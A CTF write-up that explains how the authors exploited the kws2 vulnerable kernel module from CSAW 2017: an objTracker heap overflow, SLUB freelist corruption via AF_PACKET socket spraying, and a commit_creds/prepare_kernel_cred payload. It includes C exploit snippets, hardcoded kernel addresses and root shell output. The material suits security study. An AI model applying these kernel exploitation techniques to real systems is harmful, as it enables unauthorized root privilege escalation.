As team NOPS
we took part to the European edition of the CSAW 2017
finals, held in Valence (FR). The overall experience was really
enjoyable and after 24 hours of competition we ranked 2nd!
In this post we will show how we solved kws2
. This was the second
part of a two stage challenge and so it was accessible only after
solving the first part. In this post we will cover only the second
part but the curious reader can find a detailed walk-through of the
first one
here.
Unfortunately we solved the challenge only (weeks) after the CTF
ended. Kudos to Eat Sleep Pwn Repeat
for solving it after
a few hours the finals started!
kws2
is vulnerable kernel module and thus the goal of the challenge
- as you might imagine - is to exploit it and gain root
on the
box. Long story short: the module a key-value store for Python
objects running at ring 0 (yes, you read it right!).
The challenge source code was released by the organizers during the competition and can be found along with the kernel module here. The challenge was hosted on a standard Ubuntu 16.04.3 running the Linux kernel 4.4.0-98. The only security feature shipped with this kernel was KASLR, so SMEP, SMAP and SLUB freelist randomization randomization were not in place.
The source code of the challenge is pretty long so we will focus
only on the interesting parts. The first function executed is
init_module
and which gets called when the module is inserted. This
function does nothing crazy: it initializes an hashmap used to track
the objects and registers a device (/dev/kws
) using the
misc_register
kernel function. The latter function makes the freshly
created device accessible through the ioctl
syscall.
static struct file_operations fops = { .owner = THIS_MODULE, .unlocked_ioctl = handleIoctl }; static struct miscdevice dev = { MISC_DYNAMIC_MINOR, "kws" , &fops }; int init_module(void) { printk("Hello world\n"); mainMap = kmalloc(sizeof(struct Hashmap), GFP_KERNEL); hashmapInit(mainMap); int ret = misc_register(&dev); return 0; }
The function which handles the user-space issued ioctls is
handleIoctl
(also redacted to leave only the interesting part).
static int handleIoctl(struct file *f, unsigned int cmd, void** arg) { printk("Got IOCTL %x\n",cmd); if (cmd == 1) { // store void* key_ptr; void* value_ptr; if (get_user(key_ptr, arg) || get_user(value_ptr, &arg[1])) return -EINVAL; struct Object* key = deserializeRoot(key_ptr); if (key == NULL) return -EINVAL; struct Object* value = deserializeRoot(value_ptr); if (value == NULL) return -EINVAL; hashmapInsert(mainMap, key, value); printk("Successfully created object\n"); return 0; } if (cmd == 4) { // get [redacted] } if (cmd == 5) { // delete [redacted] } return EINVAL; }
To comply with key-value store standard APIs kws2
implements three
methods: store
, get
and delete
. Let's breakdown the case where
the user issued a store command. First the function retrieves the key
and the value passed by the user (using get_user
), it then
deserialize them (using deserializeRoot
) and finally insert the two
into an hashmap. And here is where the real fun
begins. deserializeRoot
- which takes in input a pointer to a Python
object - allocates an array of 200 pointers in the kernel heap, zeroes
the objCount
variable and then pass the Python object pointer to
deserialize
.
struct Object { int type; void* data; }; struct Object* deserializeRoot(void* ptr) { objTracker = kmalloc(sizeof(void*) * 200, GFP_KERNEL); memset(objTracker, 0, sizeof(void*) * 200); objCount = 0; struct Object* root = deserialize(ptr); if (root == NULL) return NULL; [...redacted...] } struct Object* deserialize(void* ptr) { int type = getType(ptr); if (!type) return NULL; struct Object* obj = NULL; if (type == TYPE_DICT) { // Check if we used this pointer yet. // If we did don't do it again to prevent circular structure for (int i=0; i<objCount; i++) { if (objTracker[i*2] == ptr) return NULL; } obj = deserializeDict(ptr); trackObject(ptr, obj); return obj; } else if (type == TYPE_STRING || type == TYPE_INT || type == TYPE_FLOAT) { return deserializePrimative(ptr); } else { return NULL; printk("Unknown..\n"); } } struct Object* deserializePrimative(void* ptr) { int type = getType(ptr); if (!type) return NULL; struct Object* obj; if (type == TYPE_INT || type == TYPE_FLOAT) { uint64_t value; if (get_user(value, (uint64_t*)(ptr+0x10))) return NULL; obj = kmalloc(sizeof(struct Object), GFP_KERNEL); obj->data = value; } else { obj = deserializeString(ptr); } obj->type = type; trackObject(ptr, obj); return obj; } void trackObject(void* ptr, struct Object* obj) { objTracker[objCount*2] = ptr; objTracker[objCount*2+1] = obj; objCount++; }
Depending on the type of the Python object, deserialize
calls two
different function:
deserializeDict
: which handles Python dictionaries;deserializePrimative
: which handles Python str, int and float.Both functions parse the userspace object and create a equivalent
kernel version of it (struct Object
). The new object and the
userspace one are saved by trackObject
into the objTracker
array. This function takes a pointer to the objects and stores them in
two adjacent positions of objTracker
without checking the value of
objCount
. And this is exactly were the bug lies. objTracker
was
allocated earlier with a static size of 200, so what happens if, for
example, we pass a dictionary with 150 keys and 150 values? There we
go, we just got a kernel heap overflow!
Hopefully this walk-through of the code was enough to get a proper background on how the challenge works. For the next sections what's important to bear in mind is that:
The general-purpose allocator used by the kernel of this challenge is the SLUB
allocator
. We want to give you a quick overview on how it manages memory in
kernel-land to better understand the following sections of this writeup. If you
are curious to examine it more in depth, you can have a look at files
/mm/slub.c
and /mm/slab_common.c
of the kernel source code.
In kernel space performances matter and kernel object allocation has
to be as fast as possible. For this reason the SLUB allocator has a
variable number of caches
, each of which is specific to a particular
type of object. For example, all the inode
objects allocated by the
kernel will be stored in the inode_cache
, while, on the other hand,
task_struct
objects are contained in the task_struct
cache. Moreover there exist some general-purpose caches which contain
objects that have similar size. For example, kmalloc-512
contains
all the object with 256 < size <= 512
. You can monitor all the cache
types your system is using by reading /proc/slabinfo
.
Imagine caches as big cardboard boxes with different labels on them. If you open
one of these boxes you will find some other smaller boxes inside. These are
called slabs
. A slab is nothing more than a set of contiguous memory pages
reserved by the kernel. Imagine again the memory pages as even smaller boxes but
contained in the slab boxes this time. Here we can finally store our object.
Let's go up by one level to say something more about slabs. The kernel
must be fast and it must orchestrate concurrency among different
CPUs. The SLUB allocator has two different slabs: a CPU private slabs
(struct kmem_cache_cpu
), and shared slabs (struct
kmem_cache_node
). Operations on the per cpu slabs do not need any
locks (fast-path), while shared slabs (slow-path) can be accessed by
every cpu.
The crucial part to understand how we exploited this challenge is the
freelist
pointer, that is used to point to the first free slot of a
slab. The SLUB allocator provides per cpu freelists (fast-path) and a
shared freelist (slow-path) for every cache. The head of the freelist
is retrieved from kmem_cache_cpu
or, if the list is empty, from a
struct page
given back by kmem_cache_node
. The freelist itself is
stored on the free slots of a slab.
Every time we call kmalloc(), the allocation will be performed on the address pointed by the head of the freelist. On this free slot, usually at offset 0, there is a pointer to the next free slot. The pointer will become the new head of the freelist.
It is clear that if we can overflow an object in a slab, sooner or later we will end up hijacking the freelist.
The first thing we tried to do was the 101 of kernel heap
exploitation: allocate a kernel object adjacent to objTracker
and
overflow into it. Remember that the size of objTracker
is 1600 bytes
so it will be allocated in the slab-2048
. Since the kernel has
plenty of objects we wrote a gdb-python script
to find suitable ones. In this context suitable means that the object
has to contain at least one function pointer and has 1025 < size <=
2048
. . The output of the script can be found
here. As you can see, the script found 51
structures which respect these two constraints. Some of them looks
"more promising" than others. An implicit constraint that was never
explicitly pointed out is that the object has to be allocatable from
userland, for example, through a system call. In this sense struct
tcp_sock
sounds a better target than struct pci_bus
.
All of our attempts at solving the challenge in this way failed miserably: the kernel always segfaulted. After targeting several structures, we soon realized that the kernel always checks or uses some fields of the structure before calling one overwritten function pointer. Given the constraint of the overflow, these fields always ended up with meaningless and not controllable values, thus making the kernel to panic.
As of today, it is still an open question for us if it is possible to succeed using this strategy. What came out after further discussion and reading is that is indeed possible to "massage" the slab and allocate close to each other structures belonging to different cache (and so having size outside the 1025-2048 range). Frankly we didn't try this solution because in the meantime we became aware of the existence of the holy grail of slub exploiting: the fearsome freelist pointer.
The kernel is very sensitive and memory corruption on kernel heap must be handled with care. Our initial exploitation plan was not that easy to manage because it was forcing us to corrupt all the memory up to a function pointer. Our next approach is instead to control the freelist pointer to force the kernel to allocate memory in userspace. This is something doable since SMAP and SMEP are not enabled. Moreover, if we let the kernel allocate an object in user memory, we can easily overwrite a function pointer to achieve privilege escalation.
The general algorithm of our final exploit works like this:
objTracker
, overflow and corrupt the successive free object
"metadata" with a userspace address (b); Now the details.
Our favorite candidate to both massage the kernel heap and succeed in
exploitation was struct packet_sock
, allocated by the kernel when we
create a socket of type AF_PACKET
. It also has a function pointer at
byte 1304 named xmit
. For reference, the same object has been used
here
by Andrey Konovalov to exploit a vulnerability on packet sockets.
The first step was to fill the holes in kmalloc-2048
. In this way we
reach a point where subsequent allocations in this cache are adjacent
in memory. 350 AF_PACKET sockets seem to be enough on our machine:
for (i = 0; i < 350; i++) { int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0) { perror("[-] socket(AF_PACKET)"); exit(EXIT_FAILURE); } }
At this point it's time to craft an ad-hoc python dictionary that will
overflow its 2048B boundary and write a userspace address into the
next-free-object metadata of the adjacent object. Fortunately we can
forget about the low-level implementation details of Python
dictionaries, since we can use the Python APIs from C. Remember that
objTracker
can store 200 pointers at most. The vulnerable kernel
modules stores 2 pointers for a dictionary key and 2 pointers for the
linked value. The first pointer keeps track of the python object in
userspace while the second is a kernelspace pointer. In other words,
for each key/value in the python dictionary we get 4 slots occupied in
objTracker
. If the dictionary has size > 50 we are overflowing
objTracker
. On the other hand, if the size is 64 we perfectly fill
up our memory slot in kmalloc-2048
. From now on, if we prepare a
dictionary with even more elements, we will corrupt the next slot on the
slab.
The plan is to create a dictionary with 65 entries. Luckily the 65th entry will make the module overwrite the address of the next free object in the slab with an address we control.
PyObject * setup_object(PyObject **ptr) { long i = 0; PyObject *dict = PyDict_New(); PyObject *val; for (i = 0; i < 64; i++) { val = PyInt_FromLong(i); PyDict_SetItem(dict, val, val); } while (1) { val = PyInt_FromLong(i++); if (((unsigned long)val & 0xfff) == 0) { PyDict_SetItem(dict, val, val); printf("[.] obj 65 = %p\n", (void *)val); break; } } *ptr = val; return dict; }
The code above creates a dictionary that in Python terms would look
like {0:0, 1:1, 2:2, ..., 64:64}
. The insertion of the 65th element
is a little bit different. We insert a Python int
, as key and value,
only when the interpreter gives us an object stored on memory that is
page-aligned.
The module expects this dictionary as a value, so we associate a
random key to it and finally pass everything to the kernel through
an ioctl
call.
PyObject *dict = setup_object((PyObject **) &ptr); PyObject *key = PyString_FromString("a"); data[0] = (void *) key; data[1] = (void *) dict; printf("[.] send to kernel\n"); fd = open("/dev/kws", O_WRONLY); if (fd == -1) { printf("[-] cannot open /dev/kws\n"); return 0; } rv = ioctl(fd, 1, data); if (rv == -1) { perror("[-] ioctl()"); return 0; }
At this point the freelist pointer is already corrupted!
memset((void *)ptr, 0, 0x800);
First of all, we zero out the userspace free-slot the kernel will
use. Therefore when the kernel will allocate the target object in
userspace, it will find 0 as freelist pointer. This is to ensure that
the kernel will request a new page for future allocations, and will
not use whatever value was written at ptr
.
printf("[.] corrupt SLUB freelist\n"); /*Take free slot where objTracker was sitting before*/ sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /*Take adjacent slot with our next-free pointer*/ sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /*Take dummy free slot on userspace*/ sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
We have to allocate three objects on the cache we are attacking. With
the first packet socket, the kernel will allocate an object were
objTracker
was sitting before being freed. With the second socket
the kernel will overwrite the global freelist pointer with our
controlled address. This means that next time a 2048B object is
requested, the kernel will store it user space. Bingo! Since we use
AF_PACKET
, we can overwrite the xmit()
function pointer with our
get_root_payload()
address. Of course the payload must be
convenient to execute. For AF_PACKET
, xmit()
is called whenever a
user sends a packet on the packet socket.
You can see below the payload to escalate privileges...nothing new, always the same stuff already seen thousands of times.
#define COMMIT_CREDS 0xffffffff810a2850ul #define PREPARE_KERNEL_CRED 0xffffffff810a2c40ul typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); void get_root_payload(void) { ((_commit_creds) COMMIT_CREDS)( ((_prepare_kernel_cred)PREPARE_KERNEL_CRED)(0) ); }
If everything worked correctly, get_shell
should have forked a privileged shell.
[.] starting [.] namespace sandbox set up [.] commit_creds: ffffffff810a2850 [.] prepare_kernel_cred: ffffffff810a2c40 [.] padding heap [.] setup Py object [.] obj 65 = 0x1441000 [.] trigger root@ubuntu:/home/user# root@ubuntu:/home/user# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/home/user#
The full exploit code can be found here
Overall we had a lot of fun exploiting this challenge and learned a lot about the inner workings of the kernel allocator. Kudos to the challenge creator and the orgas for such a nice challenge!
published on 2018-01-25 by invano, pagabuc, nsr